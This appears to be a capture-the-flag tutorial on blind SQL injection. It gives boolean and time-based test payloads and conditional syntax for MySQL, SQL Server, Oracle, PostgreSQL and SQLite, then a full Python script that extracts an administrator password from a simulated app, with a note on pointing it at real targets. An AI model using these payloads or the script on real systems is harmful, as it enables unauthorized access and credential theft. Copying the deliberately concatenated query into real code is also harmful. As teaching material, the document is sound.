Blind Injections
Introduction
Blind SQL Injection is a type of SQL injection attack where the attacker cannot see the result of the query directly. Instead, they infer information from the application's behavior, such as whether a page element appears, differences in content length, or differences in response time. This technique applies when the application neither returns query results nor displays database errors, but still executes the injected SQL. Blind injection challenges are generally harder than normal SQLi questions, but that doesn't mean you can't solve them :)
How to identify
To identify Blind SQL Injection vulnerabilities, pay attention to subtle differences in application responses. Indicators include:
Behavior Testing: Entering SQL syntax that does not produce visible errors but causes changes in application behavior, such as differences in response times or content.
Boolean-based Testing: Using boolean conditions (true/false) to determine the existence of a vulnerability.
If Statements: Conditional expressions are one of the key techniques for Blind SQL Injection. They let you ask the database a yes/no question (for example, "is the first character of the password 'a'?") and map the answer onto two observable behaviours, such as a fast or slow response. They are also very useful for testing simpler things blindly yet accurately. The syntax differs between databases; note which forms are SQL expressions (usable inside a WHERE clause) and which are procedural statements (only valid in a stored procedure or stacked query).
MySQL If Statement (expression; usable inside a query)
Syntax: IF(condition, true-part, false-part)
Example: SELECT IF(1=1, 'true', 'false')
SQL Server If Statement (procedural; requires stacked queries, a CASE expression is the in-query alternative)
Syntax: IF condition true-part ELSE false-part
Example: IF (1=1) SELECT 'true' ELSE SELECT 'false'
Oracle If Statement (PL/SQL block; inside a plain SELECT use CASE WHEN ... THEN ... ELSE ... END instead)
Syntax: IF condition THEN true-part; ELSE false-part; END IF;
Example: IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;
PostgreSQL If Statement (expression; CASE is standard SQL and also works in MySQL, SQL Server, Oracle and SQLite)
Syntax: SELECT CASE WHEN condition THEN true-part ELSE false-part END;
Example: SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END;
SQLite If Statement (expression; iif() is available from SQLite 3.32)
Syntax: iif(condition, true-part, false-part)
Example: SELECT iif(1<2, 'True', 'False');
Use single quotes for string literals in SQLite: double quotes denote identifiers and only fall back to a string when no such column exists.
Time-based Testing: Using time delays (e.g., MySQL's SLEEP() function, PostgreSQL's pg_sleep(), SQL Server's WAITFOR DELAY) inside a conditional, so that a true condition makes the response measurably slower than a false one. This works even when the page content is identical for true and false conditions.
Example: inject a condition that is always true, then one that is always false, and compare the two responses. A difference that tracks the truth of the condition indicates the input reaches a query.
http://example.com/item.php?id=1 AND 1=1 -- (Normal response)
http://example.com/item.php?id=1 AND 1=2 -- (Different response)
or maybe a form field whose value is quoted inside the query
Product ID: A97HY' AND 1=1 -- (Normal response)
Product ID: A97HY' AND 1=2 -- (Different response)
Note the trailing space after -- : MySQL only treats -- as a comment when it is followed by whitespace.
Code/tools/websites
Tools
SQLMap: An automated tool for SQL injection and database takeover.
Burp Suite: A web vulnerability scanner with tools for manual testing.
Havij: An automated SQL injection tool.
Websites
https://ctflearn.com/challenge/430 [Quite hard]
Hint: First use an authentication bypass, then start applying blind SQL injection.
Sample problem
Problem Statement
You are provided with a web application that uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The application includes a "Welcome back" message in the page if the query returns any rows.
The database contains a different table called users, with columns called username and password.
Identify if the application is vulnerable to Blind SQL Injection and find out the password of the administrator user.
Solution
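The following is an added worked example, not the original page's solution. It covers both the identification check from "How to identify" (compare an always-true against an always-false condition) and the extraction the sample problem asks for. Because the target is a lab, the tracking-cookie application is simulated here with an in-memory SQLite database; the table contents, the administrator password, the cookie value A97HY and the "Welcome back" marker are constructed for the example. The payload shape, the SQLite functions substr()/unicode()/length() and the printable-ASCII range are assumptions: on MySQL you would use SUBSTRING()/ASCII() with a BINARY comparison (the default collation is case-insensitive), and on SQL Server SUBSTRING()/ASCII().

```python
import sqlite3

MARKER = "Welcome back"          # the text the application shows when the query returns rows
BASE_COOKIE = "A97HY"            # constructed: a valid tracking cookie value


class VulnerableApp:
    """Simulates the sample problem's endpoint.

    The cookie value is concatenated straight into the query (this is the
    vulnerability), errors are swallowed, and the only observable signal is
    whether 'Welcome back' appears in the page.
    """

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        # Constructed sample data for the example.
        self.conn.executescript("""
            CREATE TABLE tracking (id TEXT);
            INSERT INTO tracking VALUES ('A97HY');
            CREATE TABLE users (username TEXT, password TEXT);
            INSERT INTO users VALUES ('administrator', 's3cr3tPa55'), ('wiener', 'peter');
        """)
        self.requests = 0

    def request(self, tracking_cookie: str) -> str:
        self.requests += 1
        sql = "SELECT id FROM tracking WHERE id = '" + tracking_cookie + "'"
        try:
            rows = self.conn.execute(sql).fetchall()
        except sqlite3.Error:
            return "<html>Home</html>"     # no error text reaches the attacker
        return "<html>Welcome back!</html>" if rows else "<html>Home</html>"


def oracle(app: VulnerableApp, condition: str) -> bool:
    """One boolean question to the database: True iff the injected condition holds.

    The closing quote terminates the original literal, AND appends our condition,
    and '-- ' comments out the application's trailing quote (trailing space needed
    for MySQL).
    """
    payload = f"{BASE_COOKIE}' AND ({condition}) -- "
    return MARKER in app.request(payload)


def is_vulnerable(app: VulnerableApp) -> bool:
    """Identification step: an always-true and an always-false condition must differ."""
    return oracle(app, "1=1") and not oracle(app, "1=2")


def password_length(app: VulnerableApp, user: str, max_len: int = 64):
    """Find the password length first so the character loop knows when to stop."""
    for n in range(1, max_len + 1):
        if oracle(app, f"(SELECT length(password) FROM users WHERE username='{user}') = {n}"):
            return n
    return None


def extract_password(app: VulnerableApp, user: str = "administrator"):
    """Recover the password one character at a time.

    Instead of trying every character in turn, binary-search the character's
    code point with '>' comparisons: about 7 requests per character instead of
    up to 95. Comparing code points also avoids quoting issues and is
    case-sensitive regardless of the database collation.
    """
    n = password_length(app, user)
    if n is None:
        return None
    chars = []
    for pos in range(1, n + 1):
        lo, hi = 32, 126                    # assumption: printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(app, f"(SELECT unicode(substr(password,{pos},1)) FROM users "
                           f"WHERE username='{user}') > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    app = VulnerableApp()
    print("vulnerable:", is_vulnerable(app))
    print("administrator password:", extract_password(app))
    print("requests used:", app.requests)
```

The same loop works against a real target by replacing VulnerableApp.request() with an HTTP call that sets the cookie and returns the body; keep a baseline response and compare against it, since a WAF block page or an error page can also lack the marker and would otherwise read as "false".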
References
Conclusion
Blind SQL Injection exploits differences in application behavior to infer database information without directly viewing the results. Identifying and exploiting these vulnerabilities requires careful observation and systematic testing.